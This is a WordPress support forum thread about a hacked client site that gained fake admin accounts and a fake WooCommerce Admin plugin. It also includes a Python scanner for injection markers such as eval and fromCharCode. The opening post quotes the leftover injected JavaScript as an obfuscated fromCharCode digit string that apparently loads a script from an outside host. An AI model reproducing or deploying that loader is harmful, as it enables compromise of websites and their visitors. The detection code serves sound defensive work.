• Resolved Jason Ryan

    (@viablethought)


    Hello –

    Had a client’s website get compromised literally in front of my eyes where Admin accounts were being created along with a fake WooCommerce Admin plugin that was being added to the plugins directory.

    Meanwhile, there were no alerts or red flags sent; we only knew about it because of the email notifications from the website about new users being added to the website, and immediately jumped into action to remove the new users and the fake plugin that was picked up by a Wordfence scan after it was installed.

    There are still remnants of JS code being injected into the “body” class of the website:

    onmouseoverjavascriptevalString-fromCharCode33102117110991161051111104010144115441164112311011710810861611014610310111669108101109101110116661217310040349710010910511010611511297103101344138384040116611014699114101971161016910810110910111011640115414146971151211109961334844116461051006134971001091051101061151129710310134441164611511499613410411611611211558474711710998114105971199710810710511010346991111094799111117110116101114471151051091121081014610611534444010161101461031011166910810110910111011611566121849710378971091014011541914893414611297114101110116781111001014610511011510111411666101102111114101401164410141411254010011199117109101110116443411599114105112116344159

    Attempting to track down where this is being output because neither Wordfence nor Quttera is picking up on this code being left behind or its location.

    We have cleaned out several sites in the past few months and this one seems to be the strangest one we’ve seen. Typically it has been just some code injection in some WP files, but Admin accounts and a fake plugin undetected is really frightening.

    Any insight on how to do a deeper scan to find where that code above is being output into the site?

    Thanks.
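One way to do the "deeper scan" asked for above is a plain marker search over the whole install plus any database export, rather than relying on a scanner's signatures. The script below is an added example written for this thread; it is not Wordfence, Quttera or WordPress code, and the pattern names, the file list and the sample site it builds are all constructed for the demonstration. It walks a directory tree, reads PHP/JS/HTML/SQL files, and reports every line containing markers typical of obfuscated injections (String.fromCharCode followed by digits, eval(, inline event handlers such as onmouseover=, PHP decode/inflate calls, and very long digit runs). The fromCharCode regex deliberately allows a non-word character between "String" and "fromCharCode" so it also matches the punctuation-stripped form quoted in the post.

```python
"""Scan a WordPress-style file tree (and exported SQL) for injected-script markers.

Added example for this thread; not Wordfence, Quttera or WordPress code.
"""
import os
import re
import tempfile

# Markers that show up in obfuscated injections far more often than in
# legitimate theme/plugin code. Names and regexes are this example's own.
SUSPICIOUS_PATTERNS = {
    # String.fromCharCode followed by a digit run; \W? also matches the
    # punctuation-stripped form quoted in the thread ("String-fromCharCode33...").
    "fromCharCode": re.compile(r"String\W?fromCharCode\W*\d{2,}", re.I),
    "eval-call": re.compile(r"\beval\s*\("),
    "inline-event-handler": re.compile(r"\bon(mouseover|load|error)\s*=", re.I),
    "php-obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # A run of 200+ consecutive digits is almost never hand-written code.
    "long-digit-run": re.compile(r"\d{200,}"),
}

# File types worth reading; images, fonts and CSS are skipped.
SCAN_EXTENSIONS = {".php", ".js", ".html", ".htm", ".txt", ".sql"}


def scan_text(text, origin="<string>"):
    """Return one finding per (line, pattern) hit in the given text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append({
                    "origin": origin,
                    "line": lineno,
                    "pattern": name,
                    "snippet": line.strip()[:80],
                })
    return findings


def scan_tree(root):
    """Walk root and scan every file whose extension is in SCAN_EXTENSIONS."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    origin = os.path.relpath(path, root).replace(os.sep, "/")
                    findings.extend(scan_text(fh.read(), origin=origin))
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
    return findings


def summarize(findings):
    """Group findings as {origin: sorted list of distinct pattern names}."""
    summary = {}
    for f in findings:
        summary.setdefault(f["origin"], set()).add(f["pattern"])
    return {origin: sorted(names) for origin, names in summary.items()}


def build_sample_site(root):
    """Write a small constructed tree: clean files plus three with benign markers."""
    files = {
        "wp-content/themes/demo/functions.php":
            "<?php\nadd_action('wp_enqueue_scripts', 'demo_scripts');\n",
        "wp-content/themes/demo/style.css": "body { margin: 0; }\n",
        "wp-content/themes/demo/script.js": "document.title = 'demo';\n",
        # Constructed marker: harmless fromCharCode(104,105) == "hi".
        "wp-content/themes/demo/front-page.php":
            '<body class="home" onmouseover="javascript:eval(String.fromCharCode(104,105))">\n',
        # Constructed marker: decodes the literal "hello", nothing else.
        "wp-content/uploads/2019/cache.php":
            "<?php $x = base64_decode('aGVsbG8=');\n",
        # Constructed DB export line with an inline handler in widget text.
        "backup/wp_options.sql":
            "INSERT INTO wp_options VALUES (99,'widget_text','<div onload=\"go()\">','yes');\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def run_demo():
    """Build the sample site in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for origin, names in summarize(run_demo()).items():
        print(f"{origin}: {', '.join(names)}")
```

Point scan_tree at the web root (and at a dump of the database in the same tree) and review every hit by hand, since legitimate minified libraries also use eval and fromCharCode. Code that is rendered only on the home page is frequently stored in the database (post content, widget text, theme or plugin options) or in a front-page template rather than in core files, which is why the example reads .sql exports as well and why re-uploading wp-includes and wp-admin alone may not remove it.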

Viewing 3 replies - 1 through 3 (of 3 total)
  • Hey @viablethought,

    I know you’ve mentioned that you’ve cleaned out several sites recently, have you had a chance to look through the Wordfence guide on cleaning a hacked site? If not, it might shed some light on different techniques. However, if you’re still unable to track this down I’d suggest reaching out to a professional hack repair service to have it cleaned, and the point of entry patched. From this vantage point, it’s purely a guessing game.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Thanks,

    Gerroald

    Hey @viablethought,

    We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved.

    Please feel free to open another thread if you’re still having issues with Wordfence.

    Thanks,

    Gerroald

    Thread Starter Jason Ryan

    (@viablethought)

    @wfgerald

    Sorry for the delayed response. The site is running fine but that code still exists on the Home page of the site in the “body” class. But just on the Home page, no other pages.

    That said, there were 2 plugins that were removed at that time and the website hasn’t had any other issues since. The plugins were:

    1. WooCommerce Admin
    2. The Pro version of this plugin: here

    I plan on going through it with a fine-toothed comb in a couple of days to try and track down this code. I have already deleted the wp-includes and wp-admin directories and re-uploaded new files, deleted WooCommerce and re-installed that, but have a few more plugins to check.

    Thanks

  • The topic ‘Site Compromised – A Few Things…’ is closed to new replies.